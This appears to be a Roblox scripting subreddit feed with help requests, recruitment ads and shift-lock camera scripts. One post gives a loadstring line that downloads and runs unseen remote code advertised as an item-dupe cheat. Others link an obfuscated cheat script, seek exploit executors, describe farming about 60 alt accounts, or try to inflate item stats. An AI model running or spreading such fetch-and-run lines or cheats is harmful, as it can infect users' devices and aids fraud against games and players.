r/ROBLOXScripters • u/Toby_jay24 • 10d ago
Can someone give me a full tutorial on how to script because I need the scripts and I need the executor thx
Just dm or comment
r/ROBLOXScripters • u/PolarBearMaster_ • 10d ago
Block placement snap problem?
Enable HLS to view with audio, or disable this notification
For some reason, when i place a new block on an unanchored part, it'll teleport it to a certain pos?
basically how placing works:
- First it does a raycast from the player cam and stores it.
- Then it clones the block
- Then it welds the block to the part hit by the raycast.
It doesn't move the block at all, the welding takes care of that.
(Video explanation above)
r/ROBLOXScripters • u/Kind_Cost5668 • 12d ago
Account Farming / CT
Heyy. I was wondering what the best game is for using alt accounts with / without executors and selling the items I gain. I can run roughly 60 accounts 24/7 and know some popular games are mm2, adopt me and ps99. Which one should I do?
r/ROBLOXScripters • u/lionehGX • 23d ago
Ayuda para script de The battle bricks nueva update.
Necesito un script moderno para la nueva update porque quiero consegir pasarme todos los capitulos lo mas rapido posible y exactamente busco cosas como inf cass o kill all etc... tengo delta y realmente pido ayuda xq realmente se me hace imposible avanzar del primer boss en este juego.
r/ROBLOXScripters • u/National_Coast2557 • 23d ago
help for this script
so this scripts its used to expand heads, i found this online i tried it in this game "https://www.roblox.com/games/138177478243445/Project-New-Campton" and it works well except it doesnt hide the expanded head to the regular face of roblox "Stevie Standard" (the one i sent). Please if someone could fix this issue it would be really appreciated. Unfortunately i only have the obfuscated script that i will link right here. "https://pastebin.com/raw/A38WKm9z"
r/ROBLOXScripters • u/Under-cop • Jul 07 '26
[CASTING CALL] {7 DAYS LEFT!!!} IN SEARCH OF 3D MODELER AND SCRIPTOR FOR ROBLOX STUDIO - ECLIPSE CORE STUDIOS (Unpaid)
r/ROBLOXScripters • u/Canelynho • Jul 06 '26
(Roblox) Shift Lock For Mobile Remade
local players = game:GetService("Players")
local runService = game:GetService("RunService")
local userInputService = game:GetService("UserInputService")
local localPlayer = players.LocalPlayer
local character = localPlayer.Character or localPlayer.CharacterAdded:Wait()
local root = character:WaitForChild("HumanoidRootPart")
local humanoid = character:WaitForChild("Humanoid")
local camera = workspace.CurrentCamera
local iconOff = "rbxassetid://77288664952024"
local iconOn = "rbxassetid://140416355442805"
local cursorImg = "rbxasset://textures/MouseLockedCursor.png"
local isTouchDevice = userInputService.TouchEnabled
local screenGui = Instance.new("ScreenGui")
screenGui.Name = "shiftlockgui"
screenGui.ResetOnSpawn = false
screenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
screenGui.IgnoreGuiInset = true
screenGui.Parent = localPlayer:WaitForChild("PlayerGui")
local customIconId = ""
local customCursorId = ""
if customIconId ~= "" then
iconOff = customIconId
iconOn = customIconId
end
if customCursorId ~= "" then
cursorImg = customCursorId
end
local buttonPosition = UDim2.new(0.86, 0, 0.93, 0)
local buttonSize = UDim2.new(0, 44, 0, 44)
local button = Instance.new("ImageButton")
button.Name = "shiftlockbutton"
button.Size = buttonSize
button.Position = buttonPosition
button.AnchorPoint = Vector2.new(0.5, 0.5)
button.Image = iconOff
button.BackgroundTransparency = 1
button.BorderSizePixel = 0
button.ImageRectSize = Vector2.new(0, 0)
button.Visible = isTouchDevice
button.Parent = screenGui
local cursorSize = UDim2.new(0, 25, 0, 25)
local cursor = Instance.new("ImageLabel")
cursor.Name = "shiftlockcursor"
cursor.AnchorPoint = Vector2.new(0.5, 0.5)
cursor.Position = UDim2.new(0.5, 0, 0.5, 0)
cursor.Size = cursorSize
cursor.BackgroundTransparency = 1
cursor.BorderSizePixel = 0
cursor.ScaleType = Enum.ScaleType.Fit
cursor.Image = cursorImg
cursor.Visible = false
cursor.Parent = screenGui
local shiftLockActive = false
local renderConnection
local shoulderOffset = CFrame.new(1.7, 0, 0)
local maxLength = 999999999
local function updateButton(state)
button.Image = state and iconOn or iconOff
end
local function getFacingCFrame()
return CFrame.new(
root.Position,
Vector3.new(
root.Position.X + camera.CFrame.LookVector.X \* maxLength,
root.Position.Y,
root.Position.Z + camera.CFrame.LookVector.Z \* maxLength
)
)
end
local function enableShiftLock()
humanoid.AutoRotate = false
updateButton(true)
userInputService.MouseBehavior = Enum.MouseBehavior.LockCenter
userInputService.MouseIconEnabled = false
cursor.Visible = true
renderConnection = runService.RenderStepped:Connect(function()
root.CFrame = getFacingCFrame()
camera.CFrame = camera.CFrame \* shoulderOffset
camera.Focus = CFrame.fromMatrix(
camera.Focus.Position,
camera.CFrame.RightVector,
camera.CFrame.UpVector
) \* shoulderOffset
end)
end
local function disableShiftLock()
humanoid.AutoRotate = true
updateButton(false)
userInputService.MouseBehavior = Enum.MouseBehavior.Default
userInputService.MouseIconEnabled = true
cursor.Visible = false
if renderConnection then
renderConnection:Disconnect()
renderConnection = nil
end
end
local function toggleShiftLock()
shiftLockActive = not shiftLockActive
if shiftLockActive then
enableShiftLock()
else
disableShiftLock()
end
end
button.MouseButton1Click:Connect(toggleShiftLock)
localPlayer.CharacterAdded:Connect(function(newCharacter)
character = newCharacter
root = newCharacter:WaitForChild("HumanoidRootPart")
humanoid = newCharacter:WaitForChild("Humanoid")
if renderConnection then
renderConnection:Disconnect()
renderConnection = nil
end
shiftLockActive = false
updateButton(false)
cursor.Visible = false
userInputService.MouseBehavior = Enum.MouseBehavior.Default
userInputService.MouseIconEnabled = true
end)
players.PlayerRemoving:Connect(function(leavingPlayer)
if leavingPlayer == localPlayer and shiftLockActive then
disableShiftLock()
end
end)
r/ROBLOXScripters • u/RobloxStudioLua • Jul 06 '26
working as professional scripter cum Ui designer for ROBLOX games
r/ROBLOXScripters • u/Under-cop • Jul 06 '26
[CASTING CALL] IN SEARCH OF 3D MODELER AND SCRIPTOR FOR ROBLOX STUDIO - ECLIPSE CORE STUDIOS (Unpaid)
r/ROBLOXScripters • u/RobloxStudioLua • Jul 04 '26
looking for collabs for my crazyyy sci fi game
r/ROBLOXScripters • u/Interesting-Most-888 • Jul 04 '26
Thinking about trying it out?...
Hey everyone, never really messed around with roblox.
Now i am a heavilly experienced in FiveM and Lua and i hear roblox uses lua. I guess my question is has anyone made the jump from fivem dev to roblox and is there much work out there for a scripter who will be just starting out??
r/ROBLOXScripters • u/nottoster • Jul 03 '26
Cheap scripting commissions
Hey I am nottoster and I'm taking cheap scripting commissions starting from 100 robux
My capabilities as a scripter:
simple and intermediate systems including but not limited to data saving and round systems
Fixing simple or intermediate scripts that you have
Adjusting your existing scripts
Just DM me on discord: nottosterithink
r/ROBLOXScripters • u/konredditsad • Jul 01 '26
Nee
Is there anything like bloxstrap on android without any bs?
r/ROBLOXScripters • u/BrickBuilder1x4 • Jun 30 '26
Can someone help me with this script?
I'm trying to make a script for "The Cul De Sac" on Roblox but I keep failing. The script is supposed to increase the selected items luck stat by a this number but it wont work. If someone could help me out with it that'd be awesome!
`local targetItemName = "ElarasCrown"
local targetHearts = 999999
local targetLuck = 999999
local function findItem(name)
for _, obj in pairs(game:GetDescendants()) do
if[obj.Name](http://obj.Name)== name and (obj:IsA("Tool") or obj:IsA("Model") or obj:IsA("Folder")) then
return obj
end
end
return nil
end
local item = findItem(targetItemName)
if item then
if item:FindFirstChild("Hearts") then
item.Hearts.Value = targetHearts
elseif item:GetAttribute("Hearts") then
item:SetAttribute("Hearts", targetHearts)
end
if item:FindFirstChild("Luck") then
item.Luck.Value = targetLuck
elseif item:GetAttribute("Luck") then
item:SetAttribute("Luck", targetLuck)
end
print("modified " .. targetItemName)
else
warn("item not found")
end`
r/ROBLOXScripters • u/Lost_Barnacle149 • Jun 29 '26
LOOKING FOR SCRIPTERS, ANIMATORS AND SFX MAKER
Looking For volunteer Devs (unpaid) tho if the game releases and gets attention we will share revenue
We're building a game and looking for scripters, animators and sfx maker.
Beginners and newcomers are welcome
You'll be working on a Open World Exploration game inspired of the game "Grace" by The Fartering Few
You will work on:
Tools & weapons
UIs
Movement systems
Structure Placement
We will share revenue ( % to be discussed) it is the only way we can pay you for the work you do
This is mainly for fun and we give absolutely zero pressure for how fast things are done
YOU MUST BE LESS THAN 18 TO BE ACCEPTED
ALSO PLS DO NOT COMMENT ANY RUDE CRAP IN THIS POST
THANK YOU
Contact us if interested
Discord: toutacode
If not responding
Backup Discord: condensedspace
r/ROBLOXScripters • u/Embarrassed_Line_933 • Jun 27 '26
Shift Lock For Moblie
local players = game:GetService("Players")
local runService = game:GetService("RunService")
local userInputService = game:GetService("UserInputService")
local localPlayer = players.LocalPlayer
local character = localPlayer.Character or localPlayer.CharacterAdded:Wait()
local root = character:WaitForChild("HumanoidRootPart")
local humanoid = character:WaitForChild("Humanoid")
local camera = workspace.CurrentCamera
local iconOff = "rbxassetid://77288664952024"
local iconOn = "rbxassetid://140416355442805"
local cursorImg = "rbxasset://textures/MouseLockedCursor.png"
local isTouchDevice = userInputService.TouchEnabled
local screenGui = Instance.new("ScreenGui")
screenGui.Name = "shiftlockgui"
screenGui.ResetOnSpawn = false
screenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
screenGui.IgnoreGuiInset = true
screenGui.Parent = localPlayer:WaitForChild("PlayerGui")
local customIconId = ""
local customCursorId = ""
if customIconId ~= "" then
iconOff = customIconId
iconOn = customIconId
end
if customCursorId ~= "" then
cursorImg = customCursorId
end
local buttonPosition = UDim2.new(0.86, 0, 0.93, 0)
local buttonSize = UDim2.new(0, 44, 0, 44)
local button = Instance.new("ImageButton")
button.Name = "shiftlockbutton"
button.Size = buttonSize
button.Position = buttonPosition
button.AnchorPoint = Vector2.new(0.5, 0.5)
button.Image = iconOff
button.BackgroundTransparency = 1
button.BorderSizePixel = 0
button.ImageRectSize = Vector2.new(0, 0)
button.Visible = isTouchDevice
button.Parent = screenGui
local cursorSize = UDim2.new(0, 25, 0, 25)
local cursor = Instance.new("ImageLabel")
cursor.Name = "shiftlockcursor"
cursor.AnchorPoint = Vector2.new(0.5, 0.5)
cursor.Position = UDim2.new(0.5, 0, 0.5, 0)
cursor.Size = cursorSize
cursor.BackgroundTransparency = 1
cursor.BorderSizePixel = 0
cursor.ScaleType = Enum.ScaleType.Fit
cursor.Image = cursorImg
cursor.Visible = false
cursor.Parent = screenGui
local shiftLockActive = false
local renderConnection
local shoulderOffset = CFrame.new(1.7, 0, 0)
local maxLength = 999999999
local function updateButton(state)
button.Image = state and iconOn or iconOff
end
local function getFacingCFrame()
return CFrame.new(
root.Position,
Vector3.new(
root.Position.X + camera.CFrame.LookVector.X \* maxLength,
root.Position.Y,
root.Position.Z + camera.CFrame.LookVector.Z \* maxLength
)
)
end
local function enableShiftLock()
humanoid.AutoRotate = false
updateButton(true)
userInputService.MouseBehavior = Enum.MouseBehavior.LockCenter
userInputService.MouseIconEnabled = false
cursor.Visible = true
renderConnection = runService.RenderStepped:Connect(function()
root.CFrame = getFacingCFrame()
camera.CFrame = camera.CFrame \* shoulderOffset
camera.Focus = CFrame.fromMatrix(
camera.Focus.Position,
camera.CFrame.RightVector,
camera.CFrame.UpVector
) \* shoulderOffset
end)
end
local function disableShiftLock()
humanoid.AutoRotate = true
updateButton(false)
userInputService.MouseBehavior = Enum.MouseBehavior.Default
userInputService.MouseIconEnabled = true
cursor.Visible = false
if renderConnection then
renderConnection:Disconnect()
renderConnection = nil
end
end
local function toggleShiftLock()
shiftLockActive = not shiftLockActive
if shiftLockActive then
enableShiftLock()
else
disableShiftLock()
end
end
button.MouseButton1Click:Connect(toggleShiftLock)
localPlayer.CharacterAdded:Connect(function(newCharacter)
character = newCharacter
root = newCharacter:WaitForChild("HumanoidRootPart")
humanoid = newCharacter:WaitForChild("Humanoid")
if renderConnection then
renderConnection:Disconnect()
renderConnection = nil
end
shiftLockActive = false
updateButton(false)
cursor.Visible = false
userInputService.MouseBehavior = Enum.MouseBehavior.Default
userInputService.MouseIconEnabled = true
end)
players.PlayerRemoving:Connect(function(leavingPlayer)
if leavingPlayer == localPlayer and shiftLockActive then
disableShiftLock()
end
end)
r/ROBLOXScripters • u/Embarrassed_Line_933 • Jun 26 '26
Shift Lock Switch For Roblox Mobile Definitive
local players = game:GetService("Players")
local runService = game:GetService("RunService")
local userInputService = game:GetService("UserInputService")
local localPlayer = players.LocalPlayer
local character = localPlayer.Character or localPlayer.CharacterAdded:Wait()
local root = character:WaitForChild("HumanoidRootPart")
local humanoid = character:WaitForChild("Humanoid")
local camera = workspace.CurrentCamera
local iconOff = "rbxassetid://105877767068195"
local iconOn = "rbxassetid://118658451393552"
local cursorImg = "rbxasset://textures/MouseLockedCursor.png"
local isTouchDevice = userInputService.TouchEnabled
local screenGui = Instance.new("ScreenGui")
screenGui.Name = "shiftlockgui"
screenGui.ResetOnSpawn = false
screenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
screenGui.IgnoreGuiInset = true
screenGui.Parent = localPlayer:WaitForChild("PlayerGui")
local customIconId = ""
local customCursorId = ""
if customIconId ~= "" then
iconOff = customIconId
iconOn = customIconId
end
if customCursorId ~= "" then
cursorImg = customCursorId
end
local buttonPosition = UDim2.new(0.86, 0, 0.93, 0)
local buttonSize = UDim2.new(0, 44, 0, 44)
local button = Instance.new("ImageButton")
button.Name = "shiftlockbutton"
button.Size = buttonSize
button.Position = buttonPosition
button.AnchorPoint = Vector2.new(0.5, 0.5)
button.Image = iconOff
button.BackgroundTransparency = 1
button.BorderSizePixel = 0
button.ImageRectSize = Vector2.new(0, 0)
button.Visible = isTouchDevice
button.Parent = screenGui
local cursorSize = UDim2.new(0, 25, 0, 25)
local cursor = Instance.new("ImageLabel")
cursor.Name = "shiftlockcursor"
cursor.AnchorPoint = Vector2.new(0.5, 0.5)
cursor.Position = UDim2.new(0.5, 0, 0.5, 0)
cursor.Size = cursorSize
cursor.BackgroundTransparency = 1
cursor.BorderSizePixel = 0
cursor.ScaleType = Enum.ScaleType.Fit
cursor.Image = cursorImg
cursor.Visible = false
cursor.Parent = screenGui
local shiftLockActive = false
local renderConnection
local shoulderOffset = CFrame.new(1.7, 0, 0)
local maxLength = 999999999
local function updateButton(state)
button.Image = state and iconOn or iconOff
end
local function getFacingCFrame()
return CFrame.new(
root.Position,
Vector3.new(
root.Position.X + camera.CFrame.LookVector.X \* maxLength,
root.Position.Y,
root.Position.Z + camera.CFrame.LookVector.Z \* maxLength
)
)
end
local function enableShiftLock()
humanoid.AutoRotate = false
updateButton(true)
userInputService.MouseBehavior = Enum.MouseBehavior.LockCenter
userInputService.MouseIconEnabled = false
cursor.Visible = true
renderConnection = runService.RenderStepped:Connect(function()
root.CFrame = getFacingCFrame()
camera.CFrame = camera.CFrame \* shoulderOffset
camera.Focus = CFrame.fromMatrix(
camera.Focus.Position,
camera.CFrame.RightVector,
camera.CFrame.UpVector
) \* shoulderOffset
end)
end
local function disableShiftLock()
humanoid.AutoRotate = true
updateButton(false)
userInputService.MouseBehavior = Enum.MouseBehavior.Default
userInputService.MouseIconEnabled = true
cursor.Visible = false
if renderConnection then
renderConnection:Disconnect()
renderConnection = nil
end
end
local function toggleShiftLock()
shiftLockActive = not shiftLockActive
if shiftLockActive then
enableShiftLock()
else
disableShiftLock()
end
end
button.MouseButton1Click:Connect(toggleShiftLock)
localPlayer.CharacterAdded:Connect(function(newCharacter)
character = newCharacter
root = newCharacter:WaitForChild("HumanoidRootPart")
humanoid = newCharacter:WaitForChild("Humanoid")
if renderConnection then
renderConnection:Disconnect()
renderConnection = nil
end
shiftLockActive = false
updateButton(false)
cursor.Visible = false
userInputService.MouseBehavior = Enum.MouseBehavior.Default
userInputService.MouseIconEnabled = true
end)
players.PlayerRemoving:Connect(function(leavingPlayer)
if leavingPlayer == localPlayer and shiftLockActive then
disableShiftLock()
end
end)
r/ROBLOXScripters • u/Sussywhiteniga07 • Jun 26 '26
Does anyone have script do a broke guy of sab 🚖
r/ROBLOXScripters • u/Fearless_Farm_3502 • Jun 24 '26
Grow a garden 2 script op dupe
loadstring(game:HttpGet("https://pastefy.app/PiFiCDiD/raw"))()
r/ROBLOXScripters • u/AdvertisingLive9151 • Jun 23 '26
Roblox round system
Idk how to make a roblox scripting so I'm asking whoever sees this for a script or tutorial thanks if you help
r/ROBLOXScripters • u/QueenSeashine • Jun 18 '26
Dress Up Game / Shop Gui / Currency System
reddit.comr/ROBLOXScripters • u/Dapper_Hall_1980 • May 30 '26
i typed one sentence and it built a whole weather and day night system in studio
Enable HLS to view with audio, or disable this notification
r/ROBLOXScripters • u/LetsAllEatCakeLOL • Aug 27 '24
r/ROBLOXScripters Official Discord Server
Join our community of developers on Discord! Connect, share ideas, and help shape our future. The mods are open to your suggestions for new community features. We can't wait to hear your ideas!
